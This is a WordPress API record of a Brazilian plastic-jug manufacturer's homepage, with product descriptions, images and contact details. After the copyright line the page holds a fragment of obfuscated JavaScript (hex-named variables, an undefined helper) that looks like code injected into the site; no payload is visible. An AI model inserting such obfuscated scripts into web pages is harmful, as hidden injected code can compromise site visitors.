{"id":65,"date":"2022-02-21T17:07:21","date_gmt":"2022-02-21T20:07:21","guid":{"rendered":"https:\/\/galao5litros.com.br\/?page_id=65"},"modified":"2022-02-28T21:11:39","modified_gmt":"2022-03-01T00:11:39","slug":"galao-de-5-litros","status":"publish","type":"page","link":"https:\/\/galao5litros.com.br\/","title":{"rendered":"HOME"},"content":{"rendered":"<p><img decoding=\"async\" width=\"800\" height=\"389\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/logo-1024x498.png\" alt=\"Wn2 fabrica de gal\u00e3o 5 de litros\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/logo-1024x498.png 1024w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/logo-300x146.png 300w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/logo-768x374.png 768w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/logo.png 1060w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h2><a href=\"https:\/\/api.whatsapp.com\/send?phone=554135621627&#038;text=COMPRE%20DIRETO%20DA%20F%C3%81BRICA\">COMPRE DIRETO DA F\u00c1BRICA<br \/>\nPELO WHATSAPP &#8211; (41)3562-1627<\/a><\/h2>\n<p>\t\t\t<a href=\"https:\/\/api.whatsapp.com\/send?phone=554135621627&#038;text=COMPRE%20DIRETO%20DA%20F%C3%81BRICA\" role=\"button\"><br \/>\n\t\t\t\t\t\t(41)3562-1627<br \/>\n\t\t\t\t\t<\/a><\/p>\n<h1>GAL\u00d5ES DE 5 LITROS<\/h1>\n<p>COM TAMPA DE VEDA\u00c7\u00c3O<\/p>\n<p>V\u00c1RIAS CORES<\/p>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"1320\" height=\"479\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/bico-galao.png\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/bico-galao.png 1320w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/bico-galao-300x109.png 300w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/bico-galao-1024x372.png 1024w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/bico-galao-768x279.png 768w\" sizes=\"auto, (max-width: 1320px) 100vw, 1320px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h1>INDICA\u00c7\u00d5ES DE UTILIZA\u00c7\u00c3O:<\/h1>\n<ul role=\"tablist\">\n<li>\n                        <a id=\"content-fc9c194621d64bbdf5b3-tab\" data-ekit-handler-id=\"materiais-qu-micos\" data-ekit-toggle=\"tab\" data-target=\"#content-fc9c194621d64bbdf5b3\" href=\"#Content-fc9c194621d64bbdf5b3\"\n                            data-ekit-toggle-trigger=\"click\"\n                            role=\"tab\" aria-controls=\"Content-fc9c194621d64bbdf5b3\" aria-selected=\"true\"><br \/>\n                                                        Materiais Qu\u00edmicos<br \/>\n                        <\/a>\n                    <\/li>\n<li>\n                        <a id=\"content-51fc0df621d64bbdf5b3-tab\" data-ekit-handler-id=\"produtos-de-limpeza\" data-ekit-toggle=\"tab\" data-target=\"#content-51fc0df621d64bbdf5b3\" href=\"#Content-51fc0df621d64bbdf5b3\"\n                            data-ekit-toggle-trigger=\"click\"\n                            role=\"tab\" aria-controls=\"Content-51fc0df621d64bbdf5b3\" aria-selected=\"true\"><br \/>\n                                                        Produtos de limpeza<br \/>\n                        <\/a>\n                    <\/li>\n<li>\n                        <a id=\"content-43520bd621d64bbdf5b3-tab\" data-ekit-handler-id=\"produtos-aliment-cios\" data-ekit-toggle=\"tab\" data-target=\"#content-43520bd621d64bbdf5b3\" href=\"#Content-43520bd621d64bbdf5b3\"\n                            data-ekit-toggle-trigger=\"click\"\n                            role=\"tab\" aria-controls=\"Content-43520bd621d64bbdf5b3\" aria-selected=\"true\"><br \/>\n                                                        Produtos aliment\u00edcios<br \/>\n                        <\/a>\n                    <\/li>\n<li>\n                        <a id=\"content-80a9616621d64bbdf5b3-tab\" data-ekit-handler-id=\"uso-geral\" data-ekit-toggle=\"tab\" data-target=\"#content-80a9616621d64bbdf5b3\" href=\"#Content-80a9616621d64bbdf5b3\"\n                            data-ekit-toggle-trigger=\"click\"\n                            role=\"tab\" aria-controls=\"Content-80a9616621d64bbdf5b3\" aria-selected=\"true\"><br \/>\n                                                        Uso geral<br \/>\n                        <\/a>\n                    <\/li>\n<\/ul>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"800\" height=\"1006\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-marinho-3-1-814x1024.png\" alt=\"Imagem-de-gal\u00e3o-azul\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-marinho-3-1-814x1024.png 814w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-marinho-3-1-239x300.png 239w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-marinho-3-1-768x966.png 768w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-marinho-3-1.png 1104w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<p>GAL\u00c3O DE 5 LITROS VAZIO ATACADO<\/p>\n<h2>GAL\u00c3O 5 LITROS OU BOMBONA PL\u00c1STICA COMO \u00c9 CONHECIDO POPULARMENTE.<\/h2>\n<p>EM NOSSA FABRICA \u00c9 PRODUZIDO COM EST\u00c9TICA MODERNA E DESENVOLVIDO PARA VALORIZAR SEU PRODUTO.<\/p>\n<p><strong>Descri\u00e7\u00e3o<\/strong>:<br \/>Gal\u00e3o 5L<br \/>Material: PEAD<br \/>Material tampa: PP<\/p>\n<h2>GAL\u00c3O 5 LITROS ATACADO.<\/h2>\n<h2>PRODUTO R\u00cdGIDO, RESISTENTE, CONTROLADO .<\/h2>\n<h2>MENOR CUSTO PARA VOC\u00ca | MAIS RENTABILIDADE PARA SEU PRODUTO<\/h2>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"992\" height=\"1344\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-branco-3-1.jpg\" alt=\"gal\u00e3o branco\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-branco-3-1.jpg 992w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-branco-3-1-221x300.jpg 221w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-branco-3-1-756x1024.jpg 756w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-branco-3-1-768x1041.jpg 768w\" sizes=\"auto, (max-width: 992px) 100vw, 992px\" \/><br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-verde-1.jpg\" title=\"gal\u00e3o verde\" alt=\"gal\u00e3o verde\" \/><br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-marinho-3-768x1024.jpg\" alt=\"gal\u00e3o azul marinho\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-marinho-3-768x1024.jpg 768w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-marinho-3-225x300.jpg 225w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-marinho-3-1152x1536.jpg 1152w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-marinho-3.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-2-768x1024.jpg\" alt=\"gal\u00e3o azul\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-2-768x1024.jpg 768w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-2-225x300.jpg 225w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-2-1152x1536.jpg 1152w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-galao-azul-2.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h2>VENDEMOS TAMB\u00c9M AS TAMPAS EM SEPARADO <\/h2>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-1-576x1024.jpg\" alt=\"Imagem de tampa\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-1-576x1024.jpg 576w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-1-169x300.jpg 169w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-1-768x1365.jpg 768w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-1-864x1536.jpg 864w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-1.jpg 900w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-2-576x1024.jpg\" alt=\"Imagem de tampa\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-2-576x1024.jpg 576w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-2-169x300.jpg 169w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-2-768x1365.jpg 768w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-2-864x1536.jpg 864w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-2.jpg 900w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-3-576x1024.jpg\" alt=\"Imagem de tampa\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-3-576x1024.jpg 576w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-3-169x300.jpg 169w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-3-768x1365.jpg 768w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-3-864x1536.jpg 864w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-3.jpg 900w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-4-576x1024.jpg\" alt=\"Imagem de tampa\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-4-576x1024.jpg 576w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-4-169x300.jpg 169w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-4-768x1365.jpg 768w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-4-864x1536.jpg 864w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/Imagem-de-tampa-4.jpg 900w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h2>QUEREMOS SER SEU FORNECEDOR E PARCEIRO POR MUITO TEMPO<br \/>\nENTRE EM CONTATO COM NOSSO DEPARTAMENTO COMERCIAL<br \/>\nE FECHE O MELHOR NEG\u00d3CIO.<br \/>\n<\/h2>\n<h2>Contato<\/h2>\n<ul>\n<li>\n\t\t\t\t\t\t\t\t\t\t(41) 3562-1627\n\t\t\t\t\t\t\t\t\t<\/li>\n<li>\n\t\t\t\t\t\t\t\t\t\twn2galoes@gmail.com\n\t\t\t\t\t\t\t\t\t<\/li>\n<li>\n\t\t\t\t\t\t\t\t\t\tRua Alcide Nilton Motin, 1049 \u2013 CEP 83413-495 &#8211; Colombo\/PR\n\t\t\t\t\t\t\t\t\t<\/li>\n<\/ul>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"800\" height=\"389\" src=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/logo-1024x498.png\" alt=\"Wn2 fabrica de gal\u00e3o 5 de litros\" loading=\"lazy\" srcset=\"https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/logo-1024x498.png 1024w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/logo-300x146.png 300w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/logo-768x374.png 768w, https:\/\/galao5litros.com.br\/wp-content\/uploads\/2022\/02\/logo.png 1060w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<p>Todos os direitos reservados<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>COMPRE DIRETO DA F\u00c1BRICA PELO WHATSAPP &#8211; (41)3562-1627 (41)3562-1627 GAL\u00d5ES DE 5 LITROS COM TAMPA DE VEDA\u00c7\u00c3O V\u00c1RIAS CORES INDICA\u00c7\u00d5ES DE UTILIZA\u00c7\u00c3O: Materiais Qu\u00edmicos Produtos de limpeza Produtos aliment\u00edcios Uso geral GAL\u00c3O DE 5 LITROS VAZIO ATACADO GAL\u00c3O 5 LITROS OU BOMBONA PL\u00c1STICA COMO \u00c9 CONHECIDO POPULARMENTE. EM NOSSA FABRICA \u00c9 PRODUZIDO COM EST\u00c9TICA MODERNA [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_canvas","meta":{"footnotes":""},"class_list":["post-65","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/galao5litros.com.br\/index.php?rest_route=\/wp\/v2\/pages\/65","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/galao5litros.com.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/galao5litros.com.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/galao5litros.com.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/galao5litros.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=65"}],"version-history":[{"count":196,"href":"https:\/\/galao5litros.com.br\/index.php?rest_route=\/wp\/v2\/pages\/65\/revisions"}],"predecessor-version":[{"id":308,"href":"https:\/\/galao5litros.com.br\/index.php?rest_route=\/wp\/v2\/pages\/65\/revisions\/308"}],"wp:attachment":[{"href":"https:\/\/galao5litros.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=65"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}